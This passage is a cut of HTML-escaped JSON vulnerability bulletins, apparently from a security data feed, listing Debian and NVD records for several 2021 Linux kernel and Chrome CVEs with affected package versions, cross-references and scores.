&quot;CVE-2021-3892&quot;, &quot;description&quot;: &quot;memory leak in fib6_rule_suppress could result in DoS&quot;, &quot;published&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;modified&quot;: &quot;2021-10-18T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-3892&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-3892&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-07T02:52:23&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-3892&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-3892&quot;]}], &quot;modified&quot;: &quot;2021-12-07T02:52:23&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 1.7, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-07T02:52:23&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.70-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.70-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}]}, &quot;lastseen&quot;: &quot;2021-12-07T02:52:23&quot;, &quot;differentElements&quot;: [&quot;affectedPackage&quot;, &quot;modified&quot;, &quot;published&quot;], &quot;edition&quot;: 3}], &quot;viewCount&quot;: 5, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-3892&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-3892&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-3892&quot;]}], &quot;modified&quot;: &quot;2021-12-23T17:53:57&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 5.1, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T17:53:57&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.84-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.84-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-2_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-2&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}], &quot;_object_type&quot;: &quot;robots.models.debiancve.DebianCveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.debiancve.DebianCveBulletin&quot;]}, {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-4053&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;77bf538f7a80b5c9006c71c704281d9f&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-4053&quot;, &quot;description&quot;: &quot;Use after free in UI in Google Chrome on Linux prior to 96.0.4664.93 a ...&quot;, &quot;published&quot;: &quot;2021-12-23T01:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T01:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-4053&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-4053&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T09:50:01&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-4053&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;935187dc9750d560173d2ef98176e11e&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-4053&quot;, &quot;description&quot;: &quot;&quot;, &quot;published&quot;: &quot;2021-12-03T00:00:00&quot;, &quot;modified&quot;: &quot;2021-12-03T00:00:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-4053&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-4053&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-07T14:00:22&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;archlinux&quot;, &quot;idList&quot;: [&quot;ASA-202112-6&quot;, &quot;ASA-202112-7&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;MACOSX_GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;FREEBSD_PKG_18AC074C579F11ECAAC73065EC8FD3EC.NASL&quot;, &quot;MICROSOFT_EDGE_CHROMIUM_96_0_1054_53.NASL&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12373&quot;, &quot;KLA12381&quot;]}, {&quot;type&quot;: &quot;chrome&quot;, &quot;idList&quot;: [&quot;GCSA-7014601772789068319&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;18AC074C-579F-11EC-AAC7-3065EC8FD3EC&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1582-1&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44&quot;]}], &quot;modified&quot;: &quot;2021-12-07T14:00:22&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.1, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-07T14:00:22&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_90.0.4430.212-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;90.0.4430.212-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_89.0.4389.114-1~deb10u1_all.deb&quot;, &quot;packageVersion&quot;: &quot;89.0.4389.114-1~deb10u1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_93.0.4577.82-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;93.0.4577.82-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_73.0.3683.75-1~deb9u1_all.deb&quot;, &quot;packageVersion&quot;: &quot;73.0.3683.75-1~deb9u1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}]}, &quot;lastseen&quot;: &quot;2021-12-07T14:00:22&quot;, &quot;differentElements&quot;: [&quot;description&quot;, &quot;modified&quot;, &quot;published&quot;], &quot;edition&quot;: 1}], &quot;viewCount&quot;: 2, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;archlinux&quot;, &quot;idList&quot;: [&quot;ASA-202112-6&quot;, &quot;ASA-202112-7&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12381&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;MICROSOFT_EDGE_CHROMIUM_96_0_1054_53.NASL&quot;, &quot;GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;OPENSUSE-2021-1582.NASL&quot;, &quot;FREEBSD_PKG_18AC074C579F11ECAAC73065EC8FD3EC.NASL&quot;, &quot;MACOSX_GOOGLE_CHROME_96_0_4664_93.NASL&quot;]}, {&quot;type&quot;: &quot;chrome&quot;, &quot;idList&quot;: [&quot;GCSA-7014601772789068319&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;18AC074C-579F-11EC-AAC7-3065EC8FD3EC&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1582-1&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44&quot;]}], &quot;modified&quot;: &quot;2021-12-23T09:50:01&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 5.5, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T09:50:01&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_90.0.4430.212-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;90.0.4430.212-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_89.0.4389.114-1~deb10u1_all.deb&quot;, &quot;packageVersion&quot;: &quot;89.0.4389.114-1~deb10u1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_93.0.4577.82-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;93.0.4577.82-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;chromium_73.0.3683.75-1~deb9u1_all.deb&quot;, &quot;packageVersion&quot;: &quot;73.0.3683.75-1~deb9u1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;chromium&quot;}], &quot;_object_type&quot;: &quot;robots.models.debiancve.DebianCveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.debiancve.DebianCveBulletin&quot;]}, {&quot;id&quot;: &quot;DEBIANCVE:CVE-2021-44733&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;48c3a8e64b07fc034ea8720b9b448380&quot;, &quot;type&quot;: &quot;debiancve&quot;, &quot;bulletinFamily&quot;: &quot;info&quot;, &quot;title&quot;: &quot;CVE-2021-44733&quot;, &quot;description&quot;: &quot;A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem  ...&quot;, &quot;published&quot;: &quot;2021-12-22T17:15:00&quot;, &quot;modified&quot;: &quot;2021-12-22T17:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://security-tracker.debian.org/tracker/CVE-2021-44733&quot;, &quot;reporter&quot;: &quot;Debian Security Bug Tracker&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-44733&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T21:55:02&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 0, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-44733&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-44733&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-44733&quot;]}], &quot;modified&quot;: &quot;2021-12-22T21:55:02&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 4.8, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-22T21:55:02&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;affectedPackage&quot;: [{&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;12&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;11&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.10.84-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.10.84-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;10&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.19.208-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.19.208-1&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;999&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_5.15.5-2_all.deb&quot;, &quot;packageVersion&quot;: &quot;5.15.5-2&quot;, &quot;operator&quot;: &quot;le&quot;, &quot;status&quot;: &quot;open&quot;, &quot;packageName&quot;: &quot;linux&quot;}, {&quot;OS&quot;: &quot;Debian&quot;, &quot;OSVersion&quot;: &quot;9&quot;, &quot;arch&quot;: &quot;all&quot;, &quot;packageFilename&quot;: &quot;linux_4.9.228-1_all.deb&quot;, &quot;packageVersion&quot;: &quot;4.9.228-1&quot;, &quot;operator&quot;: &quot;lt&quot;, &quot;status&quot;: &quot;resolved&quot;, &quot;packageName&quot;: &quot;linux&quot;}], &quot;_object_type&quot;: &quot;robots.models.debiancve.DebianCveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.debiancve.DebianCveBulletin&quot;]}], &quot;cve&quot;: [{&quot;id&quot;: &quot;CVE-2021-45469&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;0a7ebee96f34436a36c3524fc36d94a3&quot;, &quot;type&quot;: &quot;cve&quot;, &quot;bulletinFamily&quot;: &quot;NVD&quot;, &quot;title&quot;: &quot;CVE-2021-45469&quot;, &quot;description&quot;: &quot;In __f2fs_setxattr in fs/f2fs/xattr.c in the Linux kernel through 5.15.11, there is an out-of-bounds memory access when an inode has an invalid last xattr entry.&quot;, &quot;published&quot;: &quot;2021-12-23T19:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T19:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-45469&quot;, &quot;reporter&quot;: &quot;cve@mitre.org&quot;, &quot;references&quot;: [&quot;https://git.kernel.org/pub/scm/linux/kernel/git/chao/linux.git/commit/?h=dev&amp;id=5598b24efaf4892741c798b425d543e4bed357a1&quot;, &quot;https://bugzilla.kernel.org/show_bug.cgi?id=215235&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-45469&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T21:26:02&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 1, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-45469&quot;]}], &quot;modified&quot;: &quot;2021-12-23T21:26:02&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 2.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T21:26:02&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;cpe&quot;: [], &quot;cpe23&quot;: [], &quot;cwe&quot;: [], &quot;affectedSoftware&quot;: [], &quot;affectedConfiguration&quot;: [], &quot;cpeConfiguration&quot;: {&quot;CVE_data_version&quot;: &quot;4.0&quot;, &quot;nodes&quot;: []}, &quot;extraReferences&quot;: [{&quot;url&quot;: &quot;https://git.kernel.org/pub/scm/linux/kernel/git/chao/linux.git/commit/?h=dev&amp;id=5598b24efaf4892741c798b425d543e4bed357a1&quot;, &quot;name&quot;: &quot;https://git.kernel.org/pub/scm/linux/kernel/git/chao/linux.git/commit/?h=dev&amp;id=5598b24efaf4892741c798b425d543e4bed357a1&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}, {&quot;url&quot;: &quot;https://bugzilla.kernel.org/show_bug.cgi?id=215235&quot;, &quot;name&quot;: &quot;https://bugzilla.kernel.org/show_bug.cgi?id=215235&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}], &quot;_object_type&quot;: &quot;robots.models.cve.CveBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.cve.CveBulletin&quot;, &quot;robots.models.base.Bulletin&quot;]}, {&quot;id&quot;: &quot;CVE-2021-4053&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;4a2636f9b74e26245049871a49b139ba&quot;, &quot;type&quot;: &quot;cve&quot;, &quot;bulletinFamily&quot;: &quot;NVD&quot;, &quot;title&quot;: &quot;CVE-2021-4053&quot;, &quot;description&quot;: &quot;Use after free in UI in Google Chrome on Linux prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.&quot;, &quot;published&quot;: &quot;2021-12-23T01:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T15:25:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-4053&quot;, &quot;reporter&quot;: &quot;chrome-cve-admin@google.com&quot;, &quot;references&quot;: [&quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;https://crbug.com/1267791&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-4053&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T17:26:02&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;CVE-2021-4053&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;2842ede26c401603278e3c6cde6a02fb&quot;, &quot;type&quot;: &quot;cve&quot;, &quot;bulletinFamily&quot;: &quot;NVD&quot;, &quot;title&quot;: &quot;CVE-2021-4053&quot;, &quot;description&quot;: &quot;Use after free in UI in Google Chrome on Linux prior to 96.0.4664.93 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.&quot;, &quot;published&quot;: &quot;2021-12-23T01:15:00&quot;, &quot;modified&quot;: &quot;2021-12-23T01:15:00&quot;, &quot;cvss&quot;: {&quot;score&quot;: 0.0, &quot;vector&quot;: &quot;NONE&quot;}, &quot;cvss2&quot;: {}, &quot;cvss3&quot;: {}, &quot;href&quot;: &quot;https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-4053&quot;, &quot;reporter&quot;: &quot;chrome-cve-admin@google.com&quot;, &quot;references&quot;: [&quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;https://crbug.com/1267791&quot;], &quot;cvelist&quot;: [&quot;CVE-2021-4053&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-23T06:26:02&quot;, &quot;history&quot;: [], &quot;viewCount&quot;: 6, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;mscve&quot;, &quot;idList&quot;: [&quot;MS:CVE-2021-4053&quot;]}, {&quot;type&quot;: &quot;archlinux&quot;, &quot;idList&quot;: [&quot;ASA-202112-6&quot;, &quot;ASA-202112-7&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;FREEBSD_PKG_18AC074C579F11ECAAC73065EC8FD3EC.NASL&quot;, &quot;MACOSX_GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;GOOGLE_CHROME_96_0_4664_93.NASL&quot;, &quot;MICROSOFT_EDGE_CHROMIUM_96_0_1054_53.NASL&quot;, &quot;OPENSUSE-2021-1582.NASL&quot;]}, {&quot;type&quot;: &quot;kaspersky&quot;, &quot;idList&quot;: [&quot;KLA12381&quot;]}, {&quot;type&quot;: &quot;freebsd&quot;, &quot;idList&quot;: [&quot;18AC074C-579F-11EC-AAC7-3065EC8FD3EC&quot;]}, {&quot;type&quot;: &quot;chrome&quot;, &quot;idList&quot;: [&quot;GCSA-7014601772789068319&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:1582-1&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44&quot;]}], &quot;modified&quot;: &quot;2021-12-23T06:26:02&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T06:26:02&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;cpe&quot;: [], &quot;cpe23&quot;: [], &quot;cwe&quot;: [], &quot;affectedSoftware&quot;: [], &quot;affectedConfiguration&quot;: [], &quot;cpeConfiguration&quot;: {&quot;CVE_data_version&quot;: &quot;4.0&quot;, &quot;nodes&quot;: []}, &quot;extraReferences&quot;: [{&quot;url&quot;: &quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;name&quot;: &quot;https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}, {&quot;url&quot;: &quot;https://crbug.com/1267791&quot;, &quot;name&quot;: &quot;https://crbug.com/1267791&quot;, &quot;refsource&quot;: &quot;MISC&quot;, &quot;tags&quot;: []}]}, &quot;lastseen&quot;: &quot;2021-12-23T06:26:02&quot;, &quot;differentElements&quot;: [&quot;modified&quot;], &quot;edition&quot;: 1}], &quot;viewCount&quot;: 6, 